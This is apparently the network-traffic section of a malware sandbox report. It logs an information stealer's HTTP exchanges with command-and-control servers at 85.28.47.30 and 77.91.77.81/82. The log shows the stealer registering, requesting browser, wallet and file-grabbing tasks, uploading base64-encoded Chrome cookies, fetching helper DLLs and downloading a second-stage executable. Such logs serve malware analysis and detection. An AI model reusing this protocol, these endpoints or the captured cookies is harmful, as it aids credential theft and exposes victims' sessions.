Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:21:09 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Thu, 04 Jul 2024 20:03:03 GMTConnection: keep-aliveETag: "6686fff7-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 ff 86 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 45 b2 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 85.28.47.30Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 46 36 41 36 32 38 32 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="hwid"18EF6A6282E5845770397------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="build"Nice------HCAAEGIJKEGHIDGCBAEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"browsers------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="message"plugins------GHDBAFIIECBFHIEBKJJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="message"fplugins------HIJJEGDBFIIDGCAKJEBK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECHost: 85.28.47.30Content-Length: 6143Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 85.28.47.30Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGHDGCFHIDBGDGIIIEHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 2d 2d 0d 0a Data Ascii: ------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="file"------BFBGHDGCFHIDBGDGIIIE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 2d 2d 0d 0a Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file"------GHDBKFHIJKJKECAAAECA--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"wallets------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"files------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file"------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIEHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 2d 2d 0d 0a Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="message"jbdtaijovg------FBAAAKFCAFIIDHIDGHIE--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
